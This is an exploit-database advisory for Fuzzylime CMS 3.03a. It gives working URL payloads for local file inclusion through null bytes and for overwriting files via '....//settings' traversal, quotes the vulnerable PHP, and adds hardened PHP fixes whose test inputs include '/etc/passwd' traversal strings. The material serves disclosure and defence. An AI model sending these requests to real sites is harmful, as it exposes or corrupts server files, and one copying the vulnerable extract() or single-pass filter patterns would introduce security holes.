Fuzzylime CMS 3.03a - Local Inclusion / Arbitrary File Corruption

17 Jun 2009 00:00:00 | Reported by StAkeR | Type: exploitdb | Source: www.exploit-db.com

+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc |
+-----------+------------------------------------------------------------+
| by staker | 
+-----------+---------------------+
| mail: staker[at]hotmail[dot]it  |
| url: http://cms.fuzzylime.co.uk |
+---------------------------------+    


[1][LFI]

http://[target]/[path]/code/confirm.php?e[]&list= { file + nullbyte }

Vulnerable code: confirm.php (local file inclusion; needs magic_quotes_gpc = off for the null byte)
-----------------------------------------------------------------
 1. <?
 2. @extract($HTTP_GET_VARS);  <-------- {1} 
 3. @extract($_GET);           <----------^
      
27.  elseif(isset($e)) { <------- {2}
28.       $filename = "code/mailing/$list.inc.php"; <------- {3}
29.        @include $filename; <------- {4}
-----------------------------------------------------------------
1. extract() lets any GET parameter define a variable the script has not
   set itself, so this works regardless of the register_globals setting.

2. $e is not defined anywhere else, so it becomes $_GET['e']
3. $list is not defined anywhere else, so it becomes $_GET['list']
4. $filename is built from $list and is then included
-----------------------------------------------------------------
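A hardened version of the confirm.php mailing-list include, added here as an example; it is not fuzzylime's code. The constant MAILING_DIR, the function name and the sample requests are assumptions. It reads the list name explicitly from $_GET instead of relying on extract(), checks it against a strict allowlist before any filesystem call (so "../", "/" and the null byte can never reach include), and only then builds the path:

```php
<?php
// Added example (not fuzzylime's code): a hardened confirm.php include.
// MAILING_DIR, mailing_include_path() and the sample inputs are assumed.

declare(strict_types=1);

const MAILING_DIR = __DIR__ . '/code/mailing';   // assumed location of the .inc.php files

/**
 * Resolve a mailing-list name to its include file, or return null.
 * The name is read explicitly (no extract()), must be a string, must match
 * a strict allowlist pattern, and the file must exist directly in MAILING_DIR.
 */
function mailing_include_path(array $get): ?string
{
    if (!isset($get['list']) || !is_string($get['list'])) {
        return null;                       // missing values and e[]-style arrays are rejected
    }
    $list = $get['list'];
    // Validate before touching the filesystem: is_file() with a "\0" in the
    // path throws on modern PHP, and older versions truncated at the null byte.
    if (!preg_match('/\A[a-z0-9_-]{1,64}\z/', $list)) {
        return null;
    }
    $path = MAILING_DIR . '/' . $list . '.inc.php';
    return is_file($path) ? $path : null;
}

// Constructed sample inputs mirroring the request shapes in the advisory.
$samples = [
    ['e' => '', 'list' => 'newsletter'],                 // legitimate name
    ['e' => '', 'list' => "../../../../etc/passwd\0"],   // null-byte truncation attempt
    ['e' => '', 'list' => '....//settings'],             // traversal via nested dots
    ['e' => ['x'], 'list' => ['y']],                     // array injection
];
foreach ($samples as $get) {
    $path = mailing_include_path($get);
    echo json_encode($get['list']) . ' -> '
        . ($path === null ? 'rejected' : "include $path") . PHP_EOL;
}
```

Only the first sample can ever be included, and only if code/mailing/newsletter.inc.php actually exists; the other three are rejected by the type check or the allowlist before the path is even assembled.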


[2][LFI]

http://[target]/[path]/code/display.php?template= {file + nullbyte}

Vulnerable code: display.php (local file inclusion; needs magic_quotes_gpc = 0 and register_globals = on)
--------------------------------------------------------------------
98. if($_GET['print'] != "1") include "templates/${template}_f.php";
--------------------------------------------------------------------




[3][LFC]

http://[target]/[path]/code/display.php?usecache=1&s=....//settings 
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}(mq = off)

Vulnerable code: display.php (local file corruption; needs register_globals = 1)
-----------------------------------------------------------------
  1. <?
  2. $s = $_GET[s];
  3. $p = $_GET[p];
  4. $s = str_replace("../", "", $s); <---------- {1}
  5. $p = str_replace("../", "", $p);
 ...
 54. $cachefile = "cache/${s}_${p}_$_GET[m]_$_GET[c]_$_GET[t]_$_GET[u]_$_GET[print].cache.htm"; <---- {2}
100. if($usecache == "1" && $passprot != "1" && $s != "rss" && empty($_GET[msg]) && empty($_GET[tn])) { <--- {3}
101.		if($handle = fopen($cachefile, 'w')) { // Create the cache file <-------- {4}
102.			$output = ob_get_contents();
103.			fputs($handle, $output); 
104.
105.			fclose($handle); 
106.		} 
107.	}
----------------------------------------------------------------------
1. Because of the filter in point 1 you have to write ....// to move up a
   directory: one pass of str_replace turns ....// into ../
2. $cachefile is built from the $s variable
3. If $usecache == 1 the cache-writing branch is entered
4. The file whose name you supply via $s is overwritten with the page output
-----------------------------------------------------------------------  
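An added example (not fuzzylime's code) that first shows why the single-pass str_replace in display.php is bypassable, and then a containment check for the cache-file path that validates every path component and confirms the resolved file sits inside the cache directory. The function names, the temporary cache directory and the sample inputs are assumptions:

```php
<?php
// Added example (not fuzzylime's code): the ....// bypass of a single-pass
// str_replace, and a contained builder for the cache-file path.
// weak_strip(), safe_cache_path(), the cache directory and inputs are assumed.

declare(strict_types=1);

/** The advisory's filter: one non-recursive pass removing "../". */
function weak_strip(string $s): string
{
    return str_replace('../', '', $s);
}

/**
 * Build the cache file path only if every component is a plain name and the
 * resolved parent directory is the cache directory itself. Returns null otherwise.
 */
function safe_cache_path(string $cacheDir, array $parts): ?string
{
    foreach ($parts as $part) {
        // Strict allowlist per component: no slashes, dots, null bytes or spaces.
        // (The original also interpolated $_GET[m], $_GET[c], ... unfiltered.)
        if (!is_string($part) || !preg_match('/\A[A-Za-z0-9_-]{0,40}\z/', $part)) {
            return null;
        }
    }
    $base = realpath($cacheDir);
    if ($base === false) {
        return null;                       // the cache directory must already exist
    }
    $candidate = $base . DIRECTORY_SEPARATOR . implode('_', $parts) . '.cache.htm';
    // Defence in depth: even if the allowlist were loosened later, the file's
    // parent directory must still resolve to the cache directory.
    return realpath(dirname($candidate)) === $base ? $candidate : null;
}

// 1. The bypass: stripping "../" once from "....//" leaves "../" behind.
echo 'weak_strip("....//settings") = ' . weak_strip('....//settings') . PHP_EOL;

// 2. The contained builder, run against a constructed cache directory.
$cacheDir = sys_get_temp_dir() . '/fuzzylime_cache_demo';
@mkdir($cacheDir, 0700, true);

$cases = [
    ['home', 'p1'],              // legitimate request
    ['....//settings', 'p1'],    // the advisory's payload
    ["../settings\0", 'p1'],     // null-byte variant
    ['rss', ''],                 // empty components are allowed, as in the original
];
foreach ($cases as $parts) {
    $path = safe_cache_path($cacheDir, $parts);
    echo json_encode($parts[0]) . ' -> ' . ($path ?? 'rejected') . PHP_EOL;
}
```

The first echo prints ../settings, which is the whole bug: a filter that removes a pattern once cannot be used as a sanitiser, because the input can be arranged so that the removal itself produces the forbidden pattern. Looping str_replace until nothing changes would close that particular hole but still accepts absolute paths and null bytes; rejecting anything outside a small character allowlist and checking where the path actually resolves is the robust fix.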

[x] http://www.youtube.com/watch?v=h3DQmJOkSY0

# milw0rm.com [2009-06-17]

Vulners AI Score: 7.4 (High risk)